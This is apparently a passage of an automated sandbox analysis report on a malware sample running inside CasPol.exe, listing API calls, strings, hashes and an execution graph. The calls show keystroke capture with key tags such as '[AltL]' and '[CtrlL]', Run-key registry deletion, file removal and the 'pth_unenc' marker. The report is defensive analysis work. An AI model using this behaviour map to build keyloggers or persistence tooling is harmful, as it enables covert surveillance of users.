• Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
APIs
• InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 10005F02
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpin
• String ID: InitializeCriticalSectionEx$h(RA/
• API String ID: 2593887523-3530035965
• Opcode ID: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
• Instruction ID: 674605c196627833912876511d98c7499c33f247a669ee446c9f59910835c79f
• Opcode Fuzzy Hash: 239e2963de0d6cd0752a7905e87955d260eca2173f5729cc2670a532fb8154a9
• Instruction Fuzzy Hash: B0F0B43154011CBBFB159F50CC00DEE7F61DB183D1B108025FD0966164CF32AD10AAA4
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
• Opcode ID: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
• Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
• Opcode Fuzzy Hash: 4e5e1223f7f845a1eab5c2f051b9cc675264121dd46054d4836379e51054800e
• Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Alloc
• String ID: FlsAlloc$h(RA/
• API String ID: 2773662609-133170321
• Opcode ID: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
• Instruction ID: c304bc83fd0672a576945d725d7c66755e55876121cef6cfa1c70df20931aaa1
• Opcode Fuzzy Hash: a4c1784f5932adb522d2ca488d7768f2f935f19ba84bde8ccc2372c69ff9f61f
• Instruction Fuzzy Hash: 43E0E535600228ABF325EB608C15EEFBBA4DB583D1B01405AFE0966209CE326D0185D6
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Free
• String ID: FlsFree$h(RA/
• API String ID: 3978063606-696387864
• Opcode ID: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
• Instruction ID: b54f93d543b27d774a413c601eeb0e62583d490719bbc6bc30dd5d2f1f1d8414
• Opcode Fuzzy Hash: 266330d642cf3eee4d4242d0d615bdc8a312c100e9c677cf1b977f31c441131a
• Instruction Fuzzy Hash: B8E0E571A00128ABF321EB648C15EEFBBA0CB09BC1B00416AFE0667209CE325D0096E6
APIs
• _free.LIBCMT ref: 00448835
  • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
• Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
• Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
Memory Dump Source
• Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Opcode ID: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
• Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
• Opcode Fuzzy Hash: 8b954ca590bdb4d290c694a5b82ac8cddf9bd556695a62cd8e1f2d6ba09f11ff
• Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                  • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                  Strings
                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteOpenValue
                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                  • API String ID: 2654517830-1051519024
                                                                                                                  • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                  • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                  • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                  • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                  APIs
                                                                                                                  • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: DeleteDirectoryFileRemove
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 3325800564-4028850238
                                                                                                                  • Opcode ID: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                  • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                  • Opcode Fuzzy Hash: 61d114f186a888d4709b2c681f6d3031ab31f41b35aa7972edbcea0596dbeef1
                                                                                                                  • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                  APIs
                                                                                                                  • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ObjectProcessSingleTerminateWait
                                                                                                                  • String ID: pth_unenc
                                                                                                                  • API String ID: 1872346434-4028850238
                                                                                                                  • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                  • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                  • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                  • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CountInfoInputLastTick
                                                                                                                  • String ID: >G
                                                                                                                  • API String ID: 3478931382-1296849874
                                                                                                                  • Opcode ID: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                  • Instruction ID: 569d6daaa5662565be238ffc564c13078da4f80c5dbfbbb46f8e554dd6e43052
                                                                                                                  • Opcode Fuzzy Hash: 7652f6734eefa1e2a9b5027fbe87b83264b541b1d7de72649e3f314060a3f59a
                                                                                                                  • Instruction Fuzzy Hash: C7D0127040020DBFCB00DFF5EC4D98D7FBCEB00359F104165A005A2111DB70E6448B14
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                                                                                  • GetLastError.KERNEL32 ref: 0043FB12
                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1717984340-0
                                                                                                                  • Opcode ID: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                  • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                                                                                  • Opcode Fuzzy Hash: 641cf42bdd343eb89e62379c4a250951f72419ef29a502270e4b2a68cd87e0bf
                                                                                                                  • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage: 6.2%
                                                                                                                  Dynamic/Decrypted Code Coverage: 9.2%
                                                                                                                  Signature Coverage: 0.8%
                                                                                                                  Total number of Nodes: 2000
                                                                                                                  Total number of Limit Nodes: 64
                                                                                                                  execution_graph 40501 441819 40504 430737 40501->40504 40503 441825 40505 430756 40504->40505 40506 43076d 40504->40506 40507 430774 40505->40507 40508 43075f 40505->40508 40506->40503 40510 43034a memcpy 40507->40510 40525 4169a7 11 API calls 40508->40525 40513 43077e 40510->40513 40511 4307ce 40512 430819 memset 40511->40512 40518 415b2c 40511->40518 40512->40506 40513->40506 40513->40511 40516 4307fa 40513->40516 40515 4307e9 40515->40506 40515->40512 40526 4169a7 11 API calls 40516->40526 40519 415b42 40518->40519 40521 415b46 40518->40521 40520 415b94 40519->40520 40519->40521 40523 415b5a 40519->40523 40522 4438b5 10 API calls 40520->40522 40521->40515 40522->40521 40523->40521 40524 415b79 memcpy 40523->40524 40524->40521 40525->40506 40526->40506 37540 442ec6 19 API calls 37717 4152c6 malloc 37718 4152e2 37717->37718 37719 4152ef 37717->37719 37721 416760 11 API calls 37719->37721 37721->37718 38298 4466f4 38317 446904 38298->38317 38300 446700 GetModuleHandleA 38303 446710 __set_app_type __p__fmode __p__commode 38300->38303 38302 4467a4 38304 4467ac __setusermatherr 38302->38304 38305 4467b8 38302->38305 38303->38302 38304->38305 38318 4468f0 _controlfp 38305->38318 38307 4467bd _initterm __wgetmainargs _initterm 38308 446810 38307->38308 38309 44681e GetStartupInfoW 38307->38309 38311 446866 GetModuleHandleA 38309->38311 38319 41276d 38311->38319 38315 446896 exit 38316 44689d _cexit 38315->38316 38316->38308 38317->38300 38318->38307 38320 41277d 38319->38320 38362 4044a4 LoadLibraryW 38320->38362 38322 412785 38323 412789 38322->38323 38370 414b81 38322->38370 38323->38315 38323->38316 38326 4127c8 38376 412465 memset ??2@YAPAXI 38326->38376 38328 4127ea 38388 40ac21 38328->38388 38333 412813 38406 40dd07 memset 38333->38406 38334 412827 38411 40db69 memset 38334->38411 38337 412822 38432 4125b6 ??3@YAXPAX 38337->38432 38339 40ada2 _wcsicmp 
38340 41283d 38339->38340 38340->38337 38343 412863 CoInitialize 38340->38343 38416 41268e 38340->38416 38436 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38343->38436 38345 41296f 38438 40b633 38345->38438 38350 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38354 412957 CoUninitialize 38350->38354 38359 4128ca 38350->38359 38354->38337 38355 4128d0 TranslateAcceleratorW 38356 412941 GetMessageW 38355->38356 38355->38359 38356->38354 38356->38355 38357 412909 IsDialogMessageW 38357->38356 38357->38359 38358 4128fd IsDialogMessageW 38358->38356 38358->38357 38359->38355 38359->38357 38359->38358 38360 41292b TranslateMessage DispatchMessageW 38359->38360 38361 41291f IsDialogMessageW 38359->38361 38360->38356 38361->38356 38361->38360 38363 4044f7 38362->38363 38364 4044cf GetProcAddress 38362->38364 38368 404507 MessageBoxW 38363->38368 38369 40451e 38363->38369 38365 4044e8 FreeLibrary 38364->38365 38366 4044df 38364->38366 38365->38363 38367 4044f3 38365->38367 38366->38365 38367->38363 38368->38322 38369->38322 38371 414b8a 38370->38371 38372 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38370->38372 38442 40a804 memset 38371->38442 38372->38326 38375 414b9e GetProcAddress 38375->38372 38377 4124e0 38376->38377 38378 412505 ??2@YAPAXI 38377->38378 38379 41251c 38378->38379 38381 412521 38378->38381 38464 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38379->38464 38453 444722 38381->38453 38387 41259b wcscpy 38387->38328 38469 40b1ab free free 38388->38469 38390 40ac5c 38393 40a9ce malloc memcpy free free 38390->38393 38394 40ad4b 38390->38394 38396 40ace7 free 38390->38396 38401 40ad76 38390->38401 38473 40a8d0 38390->38473 38485 4099f4 38390->38485 38393->38390 38394->38401 38493 40a9ce 38394->38493 38396->38390 38400 40a8d0 7 API calls 38400->38401 38470 40aa04 38401->38470 38402 40ada2 38404 40adc9 38402->38404 38405 40adaa 38402->38405 38403 40adb3 _wcsicmp 38403->38404 
38403->38405 38404->38333 38404->38334 38405->38403 38405->38404 38498 40dce0 38406->38498 38408 40dd3a GetModuleHandleW 38503 40dba7 38408->38503 38412 40dce0 3 API calls 38411->38412 38413 40db99 38412->38413 38575 40dae1 38413->38575 38589 402f3a 38416->38589 38418 412766 38418->38337 38418->38343 38419 4126d3 _wcsicmp 38420 4126a8 38419->38420 38420->38418 38420->38419 38422 41270a 38420->38422 38623 4125f8 7 API calls 38420->38623 38422->38418 38592 411ac5 38422->38592 38433 4125da 38432->38433 38434 4125f0 38433->38434 38435 4125e6 DeleteObject 38433->38435 38437 40b1ab free free 38434->38437 38435->38434 38436->38350 38437->38345 38439 40b640 38438->38439 38440 40b639 free 38438->38440 38441 40b1ab free free 38439->38441 38440->38439 38441->38323 38443 40a83b GetSystemDirectoryW 38442->38443 38444 40a84c wcscpy 38442->38444 38443->38444 38449 409719 wcslen 38444->38449 38447 40a881 LoadLibraryW 38448 40a886 38447->38448 38448->38372 38448->38375 38450 409724 38449->38450 38451 409739 wcscat LoadLibraryW 38449->38451 38450->38451 38452 40972c wcscat 38450->38452 38451->38447 38451->38448 38452->38451 38454 444732 38453->38454 38455 444728 DeleteObject 38453->38455 38465 409cc3 38454->38465 38455->38454 38457 412551 38458 4010f9 38457->38458 38459 401130 38458->38459 38460 401134 GetModuleHandleW LoadIconW 38459->38460 38461 401107 wcsncat 38459->38461 38462 40a7be 38460->38462 38461->38459 38463 40a7d2 38462->38463 38463->38387 38463->38463 38464->38381 38468 409bfd memset wcscpy 38465->38468 38467 409cdb CreateFontIndirectW 38467->38457 38468->38467 38469->38390 38471 40aa14 38470->38471 38472 40aa0a free 38470->38472 38471->38402 38472->38471 38474 40a8eb 38473->38474 38475 40a8df wcslen 38473->38475 38476 40a906 free 38474->38476 38477 40a90f 38474->38477 38475->38474 38478 40a919 38476->38478 38479 4099f4 3 API calls 38477->38479 38480 40a932 38478->38480 38481 40a929 free 38478->38481 38479->38478 38482 4099f4 3 API calls 38480->38482 38483 40a93e memcpy 
38481->38483 38484 40a93d 38482->38484 38483->38390 38484->38483 38486 409a41 38485->38486 38487 4099fb malloc 38485->38487 38486->38390 38489 409a37 38487->38489 38490 409a1c 38487->38490 38489->38390 38491 409a30 free 38490->38491 38492 409a20 memcpy 38490->38492 38491->38489 38492->38491 38494 40a9e7 38493->38494 38495 40a9dc free 38493->38495 38497 4099f4 3 API calls 38494->38497 38496 40a9f2 38495->38496 38496->38400 38497->38496 38522 409bca GetModuleFileNameW 38498->38522 38500 40dce6 wcsrchr 38501 40dcf5 38500->38501 38502 40dcf9 wcscat 38500->38502 38501->38502 38502->38408 38523 44db70 38503->38523 38507 40dbfd 38526 4447d9 38507->38526 38510 40dc34 wcscpy wcscpy 38552 40d6f5 38510->38552 38511 40dc1f wcscpy 38511->38510 38514 40d6f5 3 API calls 38515 40dc73 38514->38515 38516 40d6f5 3 API calls 38515->38516 38517 40dc89 38516->38517 38518 40d6f5 3 API calls 38517->38518 38519 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38518->38519 38558 40da80 38519->38558 38522->38500 38524 40dbb4 memset memset 38523->38524 38525 409bca GetModuleFileNameW 38524->38525 38525->38507 38528 4447f4 38526->38528 38527 40dc1b 38527->38510 38527->38511 38528->38527 38529 444807 ??2@YAPAXI 38528->38529 38530 44481f 38529->38530 38531 444873 _snwprintf 38530->38531 38532 4448ab wcscpy 38530->38532 38565 44474a 8 API calls 38531->38565 38534 4448bb 38532->38534 38566 44474a 8 API calls 38534->38566 38536 4448a7 38536->38532 38536->38534 38537 4448cd 38567 44474a 8 API calls 38537->38567 38539 4448e2 38568 44474a 8 API calls 38539->38568 38541 4448f7 38569 44474a 8 API calls 38541->38569 38543 44490c 38570 44474a 8 API calls 38543->38570 38545 444921 38571 44474a 8 API calls 38545->38571 38547 444936 38572 44474a 8 API calls 38547->38572 38549 44494b 38573 44474a 8 API calls 38549->38573 38551 444960 ??3@YAXPAX 38551->38527 38553 44db70 38552->38553 38554 40d702 memset GetPrivateProfileStringW 38553->38554 38555 40d752 38554->38555 38556 40d75c WritePrivateProfileStringW 
38554->38556 38555->38556 38557 40d758 38555->38557 38556->38557 38557->38514 38559 44db70 38558->38559 38560 40da8d memset 38559->38560 38561 40daac LoadStringW 38560->38561 38562 40dac6 38561->38562 38562->38561 38564 40dade 38562->38564 38574 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38562->38574 38564->38337 38565->38536 38566->38537 38567->38539 38568->38541 38569->38543 38570->38545 38571->38547 38572->38549 38573->38551 38574->38562 38585 409b98 GetFileAttributesW 38575->38585 38577 40daea 38578 40db63 38577->38578 38579 40daef wcscpy wcscpy GetPrivateProfileIntW 38577->38579 38578->38339 38586 40d65d GetPrivateProfileStringW 38579->38586 38581 40db3e 38587 40d65d GetPrivateProfileStringW 38581->38587 38583 40db4f 38588 40d65d GetPrivateProfileStringW 38583->38588 38585->38577 38586->38581 38587->38583 38588->38578 38624 40eaff 38589->38624 38593 411ae2 memset 38592->38593 38594 411b8f 38592->38594 38664 409bca GetModuleFileNameW 38593->38664 38606 411a8b 38594->38606 38596 411b0a wcsrchr 38597 411b22 wcscat 38596->38597 38598 411b1f 38596->38598 38665 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38597->38665 38598->38597 38600 411b67 38666 402afb 38600->38666 38604 411b7f 38722 40ea13 SendMessageW memset SendMessageW 38604->38722 38607 402afb 27 API calls 38606->38607 38608 411ac0 38607->38608 38609 4110dc 38608->38609 38610 41113e 38609->38610 38615 4110f0 38609->38615 38747 40969c LoadCursorW SetCursor 38610->38747 38612 411143 38748 4032b4 38612->38748 38766 444a54 38612->38766 38613 4110f7 _wcsicmp 38613->38615 38614 411157 38616 40ada2 _wcsicmp 38614->38616 38615->38610 38615->38613 38769 410c46 10 API calls 38615->38769 38619 411167 38616->38619 38617 4111af 38619->38617 38620 4111a6 qsort 38619->38620 38620->38617 38623->38420 38625 40eb10 38624->38625 38637 40e8e0 38625->38637 38628 40eb6c memcpy memcpy 38632 40ebb7 38628->38632 38629 40ebf2 ??2@YAPAXI ??2@YAPAXI 38631 40ec2e ??2@YAPAXI 38629->38631 38634 
40ec65 38629->38634 38630 40d134 16 API calls 38630->38632 38631->38634 38632->38628 38632->38629 38632->38630 38634->38634 38647 40ea7f 38634->38647 38636 402f49 38636->38420 38638 40e8f2 38637->38638 38639 40e8eb ??3@YAXPAX 38637->38639 38640 40e900 38638->38640 38641 40e8f9 ??3@YAXPAX 38638->38641 38639->38638 38642 40e911 38640->38642 38643 40e90a ??3@YAXPAX 38640->38643 38641->38640 38644 40e931 ??2@YAPAXI ??2@YAPAXI 38642->38644 38645 40e921 ??3@YAXPAX 38642->38645 38646 40e92a ??3@YAXPAX 38642->38646 38643->38642 38644->38628 38645->38646 38646->38644 38648 40aa04 free 38647->38648 38649 40ea88 38648->38649 38650 40aa04 free 38649->38650 38651 40ea90 38650->38651 38652 40aa04 free 38651->38652 38653 40ea98 38652->38653 38654 40aa04 free 38653->38654 38655 40eaa0 38654->38655 38656 40a9ce 4 API calls 38655->38656 38657 40eab3 38656->38657 38658 40a9ce 4 API calls 38657->38658 38659 40eabd 38658->38659 38660 40a9ce 4 API calls 38659->38660 38661 40eac7 38660->38661 38662 40a9ce 4 API calls 38661->38662 38663 40ead1 38662->38663 38663->38636 38664->38596 38665->38600 38723 40b2cc 38666->38723 38668 402b0a 38669 40b2cc 27 API calls 38668->38669 38670 402b23 38669->38670 38671 40b2cc 27 API calls 38670->38671 38672 402b3a 38671->38672 38673 40b2cc 27 API calls 38672->38673 38674 402b54 38673->38674 38675 40b2cc 27 API calls 38674->38675 38676 402b6b 38675->38676 38677 40b2cc 27 API calls 38676->38677 38678 402b82 38677->38678 38679 40b2cc 27 API calls 38678->38679 38680 402b99 38679->38680 38681 40b2cc 27 API calls 38680->38681 38682 402bb0 38681->38682 38683 40b2cc 27 API calls 38682->38683 38684 402bc7 38683->38684 38685 40b2cc 27 API calls 38684->38685 38686 402bde 38685->38686 38687 40b2cc 27 API calls 38686->38687 38688 402bf5 38687->38688 38689 40b2cc 27 API calls 38688->38689 38690 402c0c 38689->38690 38691 40b2cc 27 API calls 38690->38691 38692 402c23 38691->38692 38693 40b2cc 27 API calls 38692->38693 38694 402c3a 38693->38694 38695 40b2cc 27 API calls 
38694->38695 38696 402c51 38695->38696 38697 40b2cc 27 API calls 38696->38697 38698 402c68 38697->38698 38699 40b2cc 27 API calls 38698->38699 38700 402c7f 38699->38700 38701 40b2cc 27 API calls 38700->38701 38702 402c99 38701->38702 38703 40b2cc 27 API calls 38702->38703 38704 402cb3 38703->38704 38705 40b2cc 27 API calls 38704->38705 38706 402cd5 38705->38706 38707 40b2cc 27 API calls 38706->38707 38708 402cf0 38707->38708 38709 40b2cc 27 API calls 38708->38709 38710 402d0b 38709->38710 38711 40b2cc 27 API calls 38710->38711 38712 402d26 38711->38712 38713 40b2cc 27 API calls 38712->38713 38714 402d3e 38713->38714 38715 40b2cc 27 API calls 38714->38715 38716 402d59 38715->38716 38717 40b2cc 27 API calls 38716->38717 38718 402d78 38717->38718 38719 40b2cc 27 API calls 38718->38719 38720 402d93 38719->38720 38721 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38720->38721 38721->38604 38722->38594 38726 40b58d 38723->38726 38725 40b2d1 38725->38668 38727 40b5a4 GetModuleHandleW FindResourceW 38726->38727 38728 40b62e 38726->38728 38729 40b5c2 LoadResource 38727->38729 38731 40b5e7 38727->38731 38728->38725 38730 40b5d0 SizeofResource LockResource 38729->38730 38729->38731 38730->38731 38731->38728 38739 40afcf 38731->38739 38733 40b608 memcpy 38742 40b4d3 memcpy 38733->38742 38735 40b61e 38743 40b3c1 18 API calls 38735->38743 38737 40b626 38744 40b04b 38737->38744 38740 40b04b ??3@YAXPAX 38739->38740 38741 40afd7 ??2@YAPAXI 38740->38741 38741->38733 38742->38735 38743->38737 38745 40b051 ??3@YAXPAX 38744->38745 38746 40b05f 38744->38746 38745->38746 38746->38728 38747->38612 38749 4032c4 38748->38749 38750 40b633 free 38749->38750 38751 403316 38750->38751 38770 44553b 38751->38770 38755 403480 38968 40368c 15 API calls 38755->38968 38757 403489 38758 40b633 free 38757->38758 38759 403495 38758->38759 38759->38614 38760 4033a9 memset memcpy 38761 4033ec wcscmp 38760->38761 38762 40333c 38760->38762 38761->38762 38762->38755 
